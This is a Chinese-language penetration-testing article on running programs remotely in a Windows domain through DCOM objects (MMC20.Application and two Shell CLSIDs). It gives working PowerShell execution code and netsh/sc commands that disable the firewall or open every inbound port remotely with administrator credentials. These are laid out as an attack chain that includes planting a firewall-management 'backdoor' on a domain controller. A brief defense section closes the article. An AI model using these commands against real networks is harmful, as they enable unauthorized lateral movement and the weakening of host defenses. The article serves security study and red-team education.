回归最本质的信息安全

域渗透——利用DCOM在远程系统执行程序

2017年10月5日发布

53,747
0
3

导语:本文将基于Matt Nelson‏ @enigma0x3的研究,详细介绍在域环境下使用DCOM执行程序的方法,分析相关攻防思路。

0x00 前言

在以前的文章《在远程系统上执行程序的技术整理》整理过域环境下常用的程序执行方法:at、psexec、WMIC、wmiexec、smbexec和powershell remoting,这次将基于Matt Nelson‏ @enigma0x3的研究,详细介绍在域环境下使用DCOM执行程序的方法,分析相关攻防思路。

学习链接如下:

https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

0x01 简介

本文将要介绍以下内容:

· DCOM使用介绍

· 实际利用思路

· 命令行配置防火墙的技巧

· 防御思路

0x02 DCOM使用介绍

相关基础知识暂略,关于DCOM的介绍可参考如下链接:

https://msdn.microsoft.com/en-us/library/cc226801.aspx

http://blog.csdn.net/ervinsas/article/details/36424127

本节主要选取Matt Nelson‏ @enigma0x3博客中的主要利用方法进行复现

获得DCOM的程序列表:

powershell代码:

Get-CimInstance Win32_DCOMApplication

注:

Get-CimInstance只适用于Powershell 3.0及以上,Win7默认为2.0不支持,可使用以下替代命令:

Get-WmiObject -Namespace ROOTCIMV2 -Class Win32_DCOMApplication

当然,直接使用wmic查询也可以,代码如下:

wmic /NAMESPACE:"rootCIMV2" PATH Win32_DCOMApplication  GET /all /FORMAT:list

powershell对WMI的调用可使用wmic命令进行替换,详情可参考:

https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe/

1、对本机测试

管理员权限,powershell代码如下:

获得"MMC20.Application"支持的操作:

$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","127.0.0.1"))$com.Document.ActiveView | Get-Member

如下图

2-1.png

查看ExecuteShellCommand对应的参数说明:

$com.Document.ActiveView.ExecuteShellCommand

如下图

2-2.png

ExecuteShellCommand对应的参数具体含义可参考以下链接:

https://msdn.microsoft.com/en-us/library/aa815396(v=vs.85).aspx

通过ExecuteShellCommand执行程序:

$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","127.0.0.1"))$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimized")

2、对远程系统测试

测试环境:域环境

Client:关闭防火墙

Server:获得域主机内置帐户administrator的口令,可net use连接至Client

Server端管理员权限可选择执行如下powershell代码:

1.调用MMC20.Application

$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.0.2"))$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimized")

操作如下图

2-3.png

Clinet端查看程序列表,启动的calc.exe用户名为test2(Client端当前登录用户为a),如下图

2-4.png

2.调用’9BA05972-F6A8-11CF-A442-00A0C90A8F39’

$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.0.2")$obj = [System.Activator]::CreateInstance($com)$item = $obj.item()$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:windowssystem32",$null,0)

Clinet端查看程序列表,启动的calc.exe用户名为a(同Client端当前登录用户名相同),如下图

2-5.png

注:

以上两种方式适用于Win7-Win10

3.调用’C08AFD90-F2A1-11D1-8455-00A0C91F3880’

$com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"192.168.0.2")$obj = [System.Activator]::CreateInstance($com)$obj.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:windowssystem32",$null,0)

注:

该方法不适用于Win7,适用于Win10和Server2012 R2

0x03 实际利用思路

思路一:域环境未开启防火墙,直接使用

当然,需要获得域内置帐户administrator的口令

方法不再赘述

思路二:默认开启防火墙,本地修改配置关闭防火墙

这样,其他主机就可以远程操作该主机,可分别通过以下方式实现

1、通过配置入站规则支持DCOM

命令行开启任意端口的代码如下:

netsh advfirewall firewall add rule name="any" protocol=TCP dir=in localport=any action=allow

注:

DCOM通信端口是由RPC动态分配,不固定,所以将入站端口规则设置为any

添加后,防火墙高级功能面板能发现添加的入站规则,如下图

2-6.png

2、关闭防火墙功能

Windows Firewall对应的服务名为mpssvc,使用sc命令可远程关闭防火墙服务,命令如下:

sc 192.168.0.2 stop mpssvc

但关闭防火墙服务并不能关闭防火墙功能,需要使用如下命令关闭防火墙功能:

netsh advfirewall set currentprofile state off

注:

补充开启防火墙功能的命令:

netsh advfirewall set currentprofile state on

3、通过防火墙配置文件设置入站规则

防火墙默认配置规则如下:

· 阻止与规则不匹配的入站连接

· 允许与规则不匹配的出站连接

如下图

2-7.png

修改规则,允许与规则不匹配的入站连接,命令如下:

netsh advfirewall set currentprofile firewallpolicy allowinbound,allowoutbound

修改后,通过高级面板能够看到修改后的配置,如下图

3-1.png

此时,防火墙状态报警,如下图

3-2.png

还原防火墙配置的命令如下:

netsh advfirewall set currentprofile firewallpolicy blockinbound,allowoutbound

思路三:远程修改防火墙配置

可使用netsh远程配置防火墙规则,需要知道用户名密码,管理员权限执行如下命令:

netsh -r 192.168.0.2 -u TESTadministrator -p domain123! advfirewall set currentprofile firewallpolicy allowinbound,allowoutbound

注:

对当前配置文件(即域配置文件):

netsh advfirewall set currentprofile settings remotemanagement enable

所有配置文件可以使用:

netsh advfirewall set allprofiles settings remotemanagement enable

报错如下:

An error occurred while attempting to connect to the remote computer. Make sure 
that the Windows Firewall service on the remote computer is running and configur 
ed to allow remote management, and then try your request again.

说明远程计算机不允许远程管理,远程计算机需要作如下设置:

允许Windows防火墙远程管理

默认不支持,选中打勾代表开启,如下图

4-1.png

注:

该操作可通过命令行实现,本地管理员权限执行:

netsh advfirewall set currentprofile settings remotemanagement enable

该功能打开后,其他主机可远程管理本机防火墙配置:

(管理员权限)

netsh -r 192.168.0.2 -u TESTadministrator -p domain123! advfirewall firewall add rule name="any" protocol=TCP dir=in localport=any action=allow

如下图

4-2.png

综上,利用DCOM在域控远程执行程序的思路如下:

1、获取域控权限

包括域控内置帐户administrator的口令,如果域控防火墙关闭,可直接远程执行程序

注:

如果想使用其他帐户远程连接,需要先通过dcomcnfg.exe进入COM安全,激活用户的远程启动和远程激活属性

2、预置后门

如果域控开启防火墙,无法直接使用DCOM远程执行,需要获得远程修改防火墙配置的权限,该权限可通过设置允许Windows防火墙远程管理(系统默认关闭)获得

该操作需要3389连接域控或是使用其他方法在域控主机上执行代码,管理员权限执行:

netsh advfirewall set currentprofile settings remotemanagement enable

3、远程打开端口

使用netsh远程修改域控防火墙规则,打开端口

netsh -r 192.168.0.2 -u TESTadministrator -p domain123! advfirewall firewall add rule name="any" protocol=TCP dir=in localport=any action=allow

4、远程执行

使用net use 远程连接,接着执行如下powershell代码:

$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.0.2")$obj = [System.Activator]::CreateInstance($com)$item = $obj.item()$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:windowssystem32",$null,0)

注:

选择使用'9BA05972-F6A8-11CF-A442-00A0C90A8F39',执行程序的用户名为当前登录用户

5、远程恢复域控防火墙设置

netsh -r 192.168.0.2 -u TESTadministrator -p domain123! advfirewall firewall Delete rule name="any"

0x04 防御

针对利用DCOM远程执行程序,只要开启防火墙即可

也可禁用内置帐户Administrator对COM的远程启动和远程激活权限,命令如下:

dcomcnfg.exe

打开组件服务-我的电脑-属性-COM安全-启动和激活权限-编辑默认值,如下图

4-3.png

当然,通过抓包分析特征也是可以的

0x05 小结

本文对使用DCOM执行程序的方法作了利用分析,最后感谢Matt Nelson‏ @enigma0x3分享他的文章。

本文为 3gstudent 原创稿件,授权嘶吼独家发布,如若转载,请注明原文地址: http://www.4hou.com/technology/7713.html

点赞 3
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

3gstudent

3gstudent

嘶吼特约作者

发私信

发表评论